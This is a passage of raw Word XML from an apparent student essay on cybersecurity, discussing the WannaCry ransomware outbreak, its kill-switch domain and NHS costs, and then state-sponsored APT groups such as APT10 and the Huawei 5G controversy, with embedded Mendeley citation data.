        <w:t xml:space="preserve">the car manufacturer ‘Mercedes’, among </w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t>other companies</w:t>
      </w:r>
      <w:r w:rsidR="00875592">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t>institutions around Europe</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve"> that fell victim to this attack</w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF9773" w14:textId="77777777" w:rsidR="00D84DC9" w:rsidRDefault="00D84DC9" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BF65BF" w14:textId="647BC1EB" w:rsidR="00F83130" w:rsidRDefault="00D84DC9" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>ailure to perform simple security patches by the systems administrators</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">who were aware of the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>within these companies</w:t>
      </w:r>
      <w:r>
        <w:t>/institutions</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DD5E38">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve"> what ultimately led to more than 300,000 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">critical </w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>computer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve"> being </w:t>
      </w:r>
      <w:r>
        <w:t>affected</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve"> around Europe, this</w:t>
      </w:r>
      <w:r w:rsidR="00020609">
        <w:t xml:space="preserve"> damage </w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>assessment</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t xml:space="preserve"> was</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> reported by </w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>the Russian Internet security company ‘Kaspersky</w:t>
      </w:r>
      <w:r w:rsidR="00F83130">
        <w:t xml:space="preserve"> Labs</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DD5E38">
        <w:t xml:space="preserve"> in the coming months</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after the attack</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s10916-017-0752-1","ISSN":"0148-5598","abstract":"On Friday, May 12, 2017 a large cyber-attack was launched using WannaCry (or WannaCrypt). In a few days, this ransomware virus targeting Microsoft Windows systems infected more than 230,000 computers in 150 countries. Once activated, the virus demanded ransom payments in order to unlock the infected system. The widespread attack affected endless sectors-energy, transportation, shipping, telecommunications, and of course health care. Britain's National Health Service (NHS) reported that computers, MRI scanners, blood-storage refrigerators and operating room equipment may have all been impacted. Patient care was reportedly hindered and at the height of the attack, NHS was unable to care for non-critical emergencies and resorted to diversion of care from impacted facilities. While daunting to recover from, the entire situation was entirely preventable. A Bcritical^ patch had been released by Microsoft on March 14, 2017. Once applied, this patch removed any vulnerability to the virus. However, hundreds of organizations running thousands of systems had failed to apply the patch in the first 59 days it had been released. This entire situation highlights a critical need to reexamine how we maintain our health information systems. Equally important is a need to rethink how organizations sunset older, unsupported operating systems, to ensure that security risks are minimized. For example, in 2016, the NHS was reported to have thousands of computers still running Windows XP-a version no longer supported or maintained by Microsoft. There is no question that this will happen again. However, health organizations can mitigate future risk by ensuring best security practices are adhered to.","author":[{"dropping-particle":"","family":"Ehrenfeld","given":"Jesse M.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of Medical Systems","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"WannaCry, Cybersecurity and Health Information Technology: A Time to Act","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=d76f1e33-162b-4044-bea1-9fee859225ee"]}],"mendeley":{"formattedCitation":"[19]","plainTextFormattedCitation":"[19]","previouslyFormattedCitation":"[19]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CEA6F8" w14:textId="22E85F32" w:rsidR="00D91FCF" w:rsidRDefault="00D91FCF" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AAA352" w14:textId="435F9631" w:rsidR="00FD5F23" w:rsidRDefault="00D91FCF" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The WannaCry attack was deactivated by a cybersecurity researcher from Devon, UK called </w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>Markus Hutchins</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009B343A">
        <w:t>alias;MalwareTech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD5F23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">who examined the WannaCry malware in a sandbox environment </w:t>
      </w:r>
      <w:r w:rsidR="0051525A">
        <w:t>which is the testing of malware in an ‘</w:t>
      </w:r>
      <w:r>
        <w:t>Air-gapped</w:t>
      </w:r>
      <w:r w:rsidR="0051525A">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidR="0051525A">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="0051525A">
        <w:t xml:space="preserve"> contained inside </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>a virtual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t xml:space="preserve">. Markus Hutchins </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">discovered </w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>the malware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had a </w:t>
      </w:r>
      <w:r w:rsidR="00D84DC9">
        <w:t>kill switch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00232561">
        <w:t xml:space="preserve">mbedded </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00232561">
        <w:t xml:space="preserve">in its code, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that when </w:t>
      </w:r>
      <w:r w:rsidR="00102179">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102179">
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34934336" w14:textId="77777777" w:rsidR="00C247A6" w:rsidRDefault="00C247A6" w:rsidP="00C247A6">
      <w:pPr>
        <w:spacing w:line="24" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188F3591" w14:textId="526FA2FA" w:rsidR="00FD5F23" w:rsidRDefault="00C247A6" w:rsidP="00FD5F23">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C247A6">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC06129" w14:textId="77777777" w:rsidR="00C247A6" w:rsidRDefault="00C247A6" w:rsidP="00C247A6">
      <w:pPr>
        <w:spacing w:line="24" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5539F2CA" w14:textId="354FB5A9" w:rsidR="009719FA" w:rsidRDefault="00D84DC9" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">was registered as a domain, the malware was deactivated and stopped </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> further spreading</w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t xml:space="preserve"> across the Internet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This kill switch </w:t>
      </w:r>
      <w:r w:rsidR="00552954">
        <w:t>prevented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> many more computers being infected and also gave companies and institutions alike</w:t>
      </w:r>
      <w:r w:rsidR="00FD5F23">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> time to perform the vital security patches to prevent further </w:t>
      </w:r>
      <w:r w:rsidR="00552954">
        <w:t xml:space="preserve">‘WannaCry’ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61747D1F" w14:textId="728B5D31" w:rsidR="0081670D" w:rsidRDefault="00D84DC9" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>‘WannaCry’ attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> although remotely executed, human error was still the deciding factor that made the attack a success to the malicious actors.</w:t>
      </w:r>
      <w:r w:rsidR="008458AA">
        <w:t xml:space="preserve"> The cost to the NHS was estimated to be 92 Million pounds from the Wann</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008458AA">
        <w:t xml:space="preserve">Cry attack with 19,000 medical appointments and surgeries having to be cancelled which is the real-world </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>far</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t xml:space="preserve">reaching </w:t>
      </w:r>
      <w:r w:rsidR="008458AA">
        <w:t xml:space="preserve">physical </w:t>
      </w:r>
      <w:r w:rsidR="009719FA">
        <w:t>consequences</w:t>
      </w:r>
      <w:r w:rsidR="008458AA">
        <w:t xml:space="preserve"> of cyber</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008458AA">
        <w:t>warfare.</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Amid a desperate situation Friday in which hundred of thousands of ransomware attacks pelted computers in nearly 100 countries, one stroke of good fortune hit, too. As the malware analysis expert who calls himself MalwareTech rushed to examine the so-called WannaCry strain, he stumbled on a way to stop it from locking computers and slow its spread. All it took was ten bucks, and a little luck.","author":[{"dropping-particle":"","family":"Newman","given":"Lily Hay","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"wired.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"How an Accidental 'Kill Switch' Slowed Friday's Massive Ransomware Attack","type":"article-newspaper"},"uris":["http://www.mendeley.com/documents/?uuid=e5cfde02-8f8e-491c-adab-48ce1b83a6fa"]}],"mendeley":{"formattedCitation":"[20]","plainTextFormattedCitation":"[20]","previouslyFormattedCitation":"[20]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="009B343A" w:rsidRPr="009B343A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:r w:rsidR="009B343A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E37195" w14:textId="77777777" w:rsidR="007B0579" w:rsidRDefault="007B0579" w:rsidP="007B0579">
      <w:pPr>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A5E8E2" w14:textId="2F387394" w:rsidR="00553C6F" w:rsidRDefault="00553C6F" w:rsidP="00B9708C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rogue State Sponsored Hacking Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4B876" w14:textId="77777777" w:rsidR="007B0579" w:rsidRDefault="007B0579" w:rsidP="007B0579">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B6C89D" w14:textId="31FF71E5" w:rsidR="00553C6F" w:rsidRDefault="00553C6F" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00553C6F">
        <w:t>Rogue state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00553C6F">
        <w:t>sponsored hacking groups are referred to as Advanced Persistent Threat (APT) groups by western governments and cybersecurity companies, these APT groups are actively pursuing cyber espionage with mission targets taking years to complete, which shows the magnitude of state funding these groups have and the military like focus and patience they have to complete mission objectives.</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"If you want to buy a botnet, it'll cost you somewhere in the region of $700 (£433). If you just want to hire someone else's for an hour, though, it can cost as little as $2 (£1.20) -- that's long enough to take down, say, a call centre, if that's what you were in the mood for. Maybe you'd like to spy on an ex -- for $350 (£217) you can purchase a trojan that lets you see all their incoming and outgoing texts. Or maybe you're just in the market for some good, old-fashioned spamming -- it'll only cost you $10 (£6.19) for a million emails. That's the hourly minimum wage in the UK. This is the current state of Russia's underground market in cybercrime -- a vibrant community of ne'er-do-wells offering every conceivable kind of method for compromising computer security. It's been profiled in security firm Trend Micro's report, Russian Underground 101, and its findings are as fascinating as they are alarming. It's an insight into the workings of an entirely hidden economy, but also one that's pretty scary. Some of these things are really, really cheap. Rik Ferguson, Trend Micro's director of security research and communications, explains to Wired.co.uk that Russia's cybercrime market is \"very much a well-established market\". He says: \"It's very mature. It's been in place for quite some time. There are people offering niche services, and every niche is catered for.\" Russia is one of the major centres of cybercrime, alongside other nations like China and Brazil (\"the spiritual home of banking malware\"). Russian Underground 101 details the range of products on offer in this established market -- Ferguson says that they can be for targeting anyone \"from consumers to small businesses\". He points to ZeuS, a hugely popular trojan that's been around for at least six years. It creates botnets that remotely store personal information gleaned from users' machines, and has been discovered within the networks of large organisations like Bank of America, Nasa and Amazon. In 2011, the source code for ZeuS was released into the wild -- now, Ferguson says, \"it's become a criminal open source project\". Versions of ZeuS go for between $200 (£124) to $500 (£309). Cybercriminal techniques go in and out of fashion like everything else -- in that sense, ZeuS is a bit unusual in its longevity. That's in large part because viruses and trojans can be adapted to take advantage of things in the news to make their fake error messages or spam emails seem more legitimate. For example, fake …","author":[{"dropping-particle":"","family":"Steadman","given":"Ian","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Wired.co.uk","id":"ITEM-1","issued":{"date-parts":[["2012"]]},"title":"The Russian underground economy has democratised cybercrime","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=8f1300f2-3652-460e-889a-d7ca84362861"]}],"mendeley":{"formattedCitation":"[21]","plainTextFormattedCitation":"[21]","previouslyFormattedCitation":"[21]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C13921" w:rsidRPr="00C13921">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[21]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/j.cose.2017.08.005","ISSN":"01674048","abstract":"The increase of cyber attacks for the purpose of espionage is a growing threat. Recent examples, such as hacking of the Democratic National Committee and indicting by the FBI of Chinese military personnel for cyber economic espionage, are testaments of the severity of the problem. Unfortunately, research on the topic of Advanced Persistent Threats (APT) is complicated due to the fact that information is fragmented across a large number of Internet resources. This paper aims at providing a comprehensive survey of open source publications related to APT actors and their activities, focusing on the APT activities, rather than research on defensive or detective measures. It is intended to serve as a quick reference on the state of the knowledge of APT actors, where interested researchers can find what primary sources are most relevant to their research. The paper covers publications related to around 40 APT groups from multiple regions across the globe. A short summary of the main findings of each publication is presented.","author":[{"dropping-particle":"","family":"Lemay","given":"Antoine","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Calvet","given":"Joan","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Menet","given":"François","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fernandez","given":"José M.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Computers and Security","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Survey of publicly available reports on advanced persistent threat actors","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=c4a87540-e86e-4be5-83af-532ad169a7b6"]}],"mendeley":{"formattedCitation":"[22]","plainTextFormattedCitation":"[22]","previouslyFormattedCitation":"[22]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C13921" w:rsidRPr="00C13921">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[22]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E85995" w14:textId="51C16239" w:rsidR="00AE0170" w:rsidRDefault="00AE0170" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3307873A" w14:textId="3A9C9473" w:rsidR="00C13921" w:rsidRDefault="00AE0170" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">China </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reported to be the most active and successful elite APT group that ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> been given the alias ‘APT-10’ by the US authorities. According to the US </w:t>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:t xml:space="preserve">and UK </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">security services APT-10, are tasked with hacking western governments to steal intellectual property from western companies so that the Chinese communist party can utilise, to reproduce western technologies along with the cyberespionage of western government institutions. APT-10 according to the NSA are reportedly responsible for creating malware that is installed within networking equipment and smart IoT devices that is sold within western countries for cyber-espionage purposes. </w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"In the world of computer security, the concept of an \"Advanced Persistant Threat\" has garnered a great deal of publicity recently. Commonly referred to by","author":[{"dropping-particle":"","family":"Gold","given":"Daniel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"InfoSec Institute","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"Unit 61398: Chinese Cyber-Espionage and the Advanced Persistent Threat","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=14c09493-ccf5-44dd-a81a-4d22f107ef1a"]}],"mendeley":{"formattedCitation":"[23]","plainTextFormattedCitation":"[23]","previouslyFormattedCitation":"[23]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C13921" w:rsidRPr="00C13921">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[23]</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"","family":"NCSA","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ncsa.gov.uk","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"APT10 continuing to target UK organisations","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=a58ae740-7739-4e5a-8e98-b30f50d62f17"]}],"mendeley":{"formattedCitation":"[24]","plainTextFormattedCitation":"[24]","previouslyFormattedCitation":"[24]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC" w:rsidRPr="00CF1AEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[24]</w:t>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA0DF1" w14:textId="77777777" w:rsidR="00C13921" w:rsidRDefault="00C13921" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595B6EE2" w14:textId="06BA4998" w:rsidR="00C13921" w:rsidRDefault="00AE0170" w:rsidP="00553C6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most recent and </w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t>high-profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> investigation into a Chinese state</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>sponsored technology company</w:t>
      </w:r>
      <w:r w:rsidR="008F30C7">
        <w:t xml:space="preserve"> by the US government,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the ‘Huawei’ network hardware manufacturer that is currently the market leader within 5G networking equipment that European governments and ISP’s have bought in a bid to upgrade their network infrastructure to create the future ‘Smart Cities’ that 5G technology is the foundation.</w:t>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF1AEC">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/00396338.2019.1568041","ISSN":"14682699","abstract":"Chinese telecommunications titan Huawei has been suffering from the kind of publicity no company would ever welcome. In short order, Australia, New Zealand and Japan have all banned Huawei from taking part in the devel- opment of 5G networks owing to security concerns. The United Kingdom’s British Telecom (BT), which has been using Huawei equipment in its core networks for the past decade, has announced that it will not use Huawei equipment in its 5G networks, and is stripping Huawei equipment out of its 3G and 4G networks. In December, the heads of the British, Canadian and other allied intelligence services expressed concerns about security threats posed by Chinese technology.1 These developments suggest that the United States has been whipping its key allies into line. Meanwhile, European Commissioner for Digital Single Market Andrus Ansip stated that the EU should be worried about the threat posed by Huawei and other Chinese technology companies to the bloc’s industry and security.","author":[{"dropping-particle":"","family":"Inkster","given":"Nigel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Survival","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"The Huawei affair and China’s technology ambitions","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=d4006cc6-564d-4b0a-a856-c89ee27311a5"]},{"id":"ITEM-2","itemData":{"DOI":"10.1109/COMST.2016.2532458","ISSN":"1553877X","abstract":"The vision of next generation 5G wireless communications lies in providing very high data rates (typically of Gbps order), extremely low latency, manifold increase in base station capacity and significant improvement in users’ perceived Quality of Service (QoS), compared to current 4G LTE networks. Ever increasing proliferation of smart devices, introduction of new emerging multimedia applications, together with an exponential rise in wireless data (multimedia) demand and usage is already creating a significant burden on existing cellular networks. 5G wireless systems, with improved data rates, capacity, latency and QoS are expected to be the panacea of most of the current cellular networks’ problems. In this paper, we make an exhaustive review of wireless evolution towards 5G networks. We first discuss the new architectural changes associated with the Radio Access Network (RAN) design, including air interfaces, smart antennas, cloud and heterogeneous RAN. Subsequently, we make an in depth survey of underlying novel mm-wave physical layer technologies, encompassing new channel model estimation, directional antenna design, beamforming algorithms and massive MIMO technologies. Next, the details of MAC layer protocols and multiplexing schemes, needed to efficiently support this new physical layer are discussed. We also look into the killer applications, considered as the major driving force behind 5G. In order to understand the improved user experience, we provide highlights of new QoS, QoE and SON features associated with the 5G evolution. For alleviating the increased network energy consumption and operating expenditure, we make a detail review on energy awareness and cost efficiency. As understanding the current status of 5G implementation is important for its eventual commercialization, we also discuss relevant field trials, drive tests and simulation experiments. Finally, we point out major existing research issues and identify possible future resea- ch directions.","author":[{"dropping-particle":"","family":"Agiwal","given":"Mamta","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Roy","given":"Abhishek","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saxena","given":"Navrati","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Communications Surveys and Tutorials","id":"ITEM-2","issued":{"date-parts":[["2016"]]},"title":"Next generation 5G wireless networks: A comprehensive survey","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=f6750d2f-c502-439d-950e-df12f5be0987"]}],"mendeley":{"formattedCitation":"[25], [26]","plainTextFormattedCitation":"[25], [26]","previouslyFormattedCitation":"[25], [26]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C13921">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
